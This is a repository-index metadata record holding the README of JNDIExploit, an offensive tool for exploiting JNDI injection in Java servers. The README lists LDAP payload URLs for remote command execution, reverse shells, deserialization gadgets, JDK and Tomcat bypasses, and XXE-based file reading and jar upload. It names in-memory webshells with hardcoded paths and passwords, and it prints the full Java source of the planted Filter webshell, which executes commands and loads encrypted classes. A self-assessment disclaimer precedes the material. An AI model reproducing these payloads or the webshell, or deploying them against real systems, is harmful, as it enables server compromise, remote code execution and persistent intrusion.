{"id":18555357,"url":"https://github.com/0x727/jndiexploit","last_synced_at":"2025-10-25T09:42:23.289Z","repository":{"id":58273977,"uuid":"419953601","full_name":"0x727/JNDIExploit","owner":"0x727","description":"A tool for exploiting JNDI injection. It borrows heavily from / reuses code from the Rogue JNDI project, supports directly planting an in-memory shell, integrates the common ways of bypassing newer JDK versions, and is intended to be used together with automated tools.","archived":false,"fork":false,"pushed_at":"2022-09-06T00:43:52.000Z","size":85172,"stargazers_count":342,"open_issues_count":0,"forks_count":28,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-07-27T05:23:07.677Z","etag":null,"topics":["exp","exploit","jndi","jndiexploit"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x727.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-10-22T03:27:53.000Z","updated_at":"2025-07-14T02:34:25.000Z","dependencies_parsed_at":"2022-08-31T13:41:53.780Z","dependency_job_id":null,"html_url":"https://github.com/0x727/JNDIExploit","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/0x727/JNDIExploit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x727","download_url":"https://codeload.github.com/0x727/JNDIExploit/tar.gz/refs/heads/mast
er","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":280936411,"owners_count":26416543,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-25T02:00:06.499Z","response_time":81,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exp","exploit","jndi","jndiexploit"],"created_at":"2024-11-06T21:26:16.528Z","updated_at":"2025-10-25T09:42:23.245Z","avatar_url":"https://github.com/0x727.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# JNDIExploit\n\nA tool for exploiting ```JNDI injection```. It borrows heavily from / reuses code from the ```Rogue JNDI``` project, supports directly ```planting an in-memory shell```, integrates the common ways of ```bypassing newer JDK versions```, and is intended to be used together with automated tools.\n\n---\n\n\n\n## Disclaimer\n\nThis tool is intended only for security self-assessment.\n\nAny direct or indirect consequences and losses caused by spreading or using the information provided by this tool are the sole responsibility of the user; the author accepts no liability for them.\n\nThe author holds the right to modify and interpret this tool. Without permission from the network security department and the relevant authorities, this tool must not be used for any attack activity, nor used for commercial purposes in any way.\n\n---\n\n\n\n## Additions\n\nThe additions exist to support the SpringBootExploit tool; this is a customised server build.\n\n1. Startup: java -jar JNDIExploit-1.2-SNAPSHOT.jar binds 127.0.0.1 by default, with LDAP on port 1389 and the HTTP server on port 3456\n2. BehinderFilter.class in the root directory is the in-memory shell; the path is /ateam and the password is ateamnb\n3. Calc.class in the root directory pops a calculator\n4. data/behinder3.jar exists to support SnakeYaml RCE\n5. An HTTPServer was added to handle more requests, for better support of the SpringBootExploit tool\n6. Files placed in the data directory can be served through the HTTPServer, like Python's HTTPServer\n\n---\n\n## TODO\n\n1. Exploitation via deserialization from the local ClassPath\n2. Support a custom in-memory shell password\n3. Rework the in-memory shell module\n\n---\n\n\n\n## Usage\n\nRun ```java -jar JNDIExploit.jar -h``` to see the parameter descriptions; the ```--ip``` parameter is required.\n\n```\nUsage: java -jar JNDIExploit.jar [options]\n  Options:\n  * -i, --ip       Local ip address\n    -l, --ldapPort Ldap bind port (default: 1389)\n    -p, --httpPort Http bind port (default: 8080)\n    -u, --usage    Show usage (default: false)\n    -h, --help     Show this help\n```\n\nRun ```java -jar JNDIExploit.jar -u``` to see the supported LDAP formats\n```\nSupported LADP Queries\n* all words are case INSENSITIVE when send to ldap server\n\n[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.\n    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]\n    ldap://127.0.0.1:1389/Basic/Command/[cmd]\n    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/Basic/TomcatEcho\n    ldap://127.0.0.1:1389/Basic/SpringEcho\n    ldap://127.0.0.1:1389/Basic/WeblogicEcho\n    ldap://127.0.0.1:1389/Basic/TomcatMemshell1\n    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]\n    ldap://127.0.0.1:1389/Basic/JettyMemshell\n    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1\n    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2\n    ldap://127.0.0.1:1389/Basic/JBossMemshell\n    ldap://127.0.0.1:1389/Basic/WebsphereMemshell\n    ldap://127.0.0.1:1389/Basic/SpringMemshell\n\n[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.\n    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]\n    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]\n    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho\n    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho\n    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho\n    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1\n    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1\n    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells\n\n[+] TomcatBypass Queries\n    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]\n    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]\n    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho\n    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]\n    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell\n\n[+] GroovyBypass Queries\n    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]\n    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]\n\n[+] WebsphereBypass Queries\n    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell\n    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp\n```\n* All currently supported ```PayloadType``` values:\n  * ```Dnslog```: generates a ```DNS``` request, to be used together with a ```DNSLog``` platform; simple adaptation for ```Linux/Windows```\n  * ```Command```: executes a command; if the command contains special characters it can be ```Base64-encoded``` before transmission\n  * ```ReverseShell```: a reverse shell for ```Linux``` systems, for convenience\n  * ```TomcatEcho```: echoes command output when the middleware is ```Tomcat```; the command to run is passed by adding a custom ```header``` ```cmd: whoami```\n  * ```SpringEcho```: echoes command output when the framework is ```SpringMVC/SpringBoot```; the command to run is passed by adding a custom ```header``` ```cmd: whoami```\n  * ```WeblogicEcho```: echoes command output when the middleware is ```Weblogic```; the command to run is passed by adding a custom ```header``` ```cmd: whoami```\n  * ```TomcatMemshell1```: plants a ```Tomcat in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n  * ```TomcatMemshell2```: plants a ```Tomcat in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```; requires the extra ```HTTP Header``` ```Shell: true```; this method is **recommended**\n  * ```SpringMemshell```: plants a ```Spring in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n  * ```WeblogicMemshell1```: plants a ```Weblogic in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n  * ```WeblogicMemshell2```: plants a ```Weblogic in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```; this method is **recommended**\n  * ```JettyMemshell```: plants a ```Jetty in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n  * ```JBossMemshell```: plants a ```JBoss in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n  * ```WebsphereMemshell```: plants a ```Websphere in-memory shell```; supports ```Behinder shell``` and ```Basic cmd shell```\n* All currently supported ```GadgetType``` values:\n  * ```URLDNS```\n  * ```CommonsBeanutils1```\n  * ```CommonsBeanutils2```\n  * ```CommonsCollectionsK1```\n  * ```CommonsCollectionsK2```\n  * ```C3P0```\n  * ```Jdk7u21```\n  * ```Jre8u20```\n  * ```CVE_2020_2551```\n  * ```CVE_2020_2883```\n* The 3 actions in ```WebsphereBypass```:\n  * ```list```: uses ```XXE``` to view directories or file contents on the target server\n  * ```upload```: uses the ```jar protocol``` via ```XXE``` to upload a malicious ```jar``` to the target server's temporary directory\n  * ```rce```: loads the ```jar``` already uploaded to the target server's temporary directory to achieve remote code execution (this step could not be reproduced locally; it throws a ```java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.``` exception; anyone who has reproduced it successfully, please advise)\n\n## ```In-memory shell``` notes\n* Implemented by dynamically adding a ```Filter/Controller``` and moving the added ```Filter``` to the first position in the ```FilterChain```\n* For ```in-memory shell``` compatibility test results, see the [memshell](https://github.com/feihong-cs/memShell) project\n* The ```Basic cmd shell``` is accessed as ```/anything?type=basic\u0026pass=[cmd]```\n* Accessing the ```Behinder shell``` requires a modified ```Behinder (冰蝎)``` client (modify it yourself following method two in [Modifying Behinder to support a fileless webshell based on a Tomcat Filter](https://mp.weixin.qq.com/s/n1wrjep4FVtBkOxLouAYfQ)); the ```X-Options-Ai``` header must be added to requests, and the password is ```rebeyond```\n\nThe planted Filter code is as follows:\n```\npublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {\n        System.out.println(\"[+] Dynamic Filter says hello\");\n        String k;\n        Cipher cipher;\n        if (servletRequest.getParameter(\"type\") != null \u0026\u0026 servletRequest.getParameter(\"type\").equals(\"basic\")) {\n            k = servletRequest.getParameter(\"pass\");\n            if (k != null \u0026\u0026 !k.isEmpty()) {\n                cipher = null;\n                String[] cmds;\n                if (File.separator.equals(\"/\")) {\n                    cmds = new String[]{\"/bin/sh\", \"-c\", k};\n                } else {\n                    cmds = new String[]{\"cmd\", \"/C\", k};\n                }\n\n                String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter(\"\\\\A\").next();\n                servletResponse.getWriter().println(result);\n            }\n        } else if (((HttpServletRequest)servletRequest).getHeader(\"X-Options-Ai\") != null) {\n            try {\n                if (((HttpServletRequest)servletRequest).getMethod().equals(\"POST\")) {\n                    k = \"e45e329feb5d925b\";\n                    ((HttpServletRequest)servletRequest).getSession().setAttribute(\"u\", k);\n                    cipher = Cipher.getInstance(\"AES\");\n                    cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute(\"u\") + \"\").getBytes(), \"AES\"));\n                    byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));\n                    Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod(\"defineClass\", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());\n                    Object evilObject = evilClass.newInstance();\n                    Method targetMethod = evilClass.getDeclaredMethod(\"equals\", ServletRequest.class, ServletResponse.class);\n                    targetMethod.invoke(evilObject, servletRequest, servletResponse);\n                }\n            } catch (Exception var10) {\n                var10.printStackTrace();\n            }\n        } else {\n            filterChain.doFilter(servletRequest, servletResponse);\n        }\n\n    }\n```\n\n## References\n* https://github.com/veracode-research/rogue-jndi\n* https://github.com/welk1n/JNDI-Injection-Exploit\n* https://github.com/welk1n/JNDI-Injection-Bypass\n\n\n\n![as](https://starchart.cc/0x727/JNDIExploit.svg)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x727%2Fjndiexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x727%2Fjndiexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x727%2Fjndiexploit/lists"}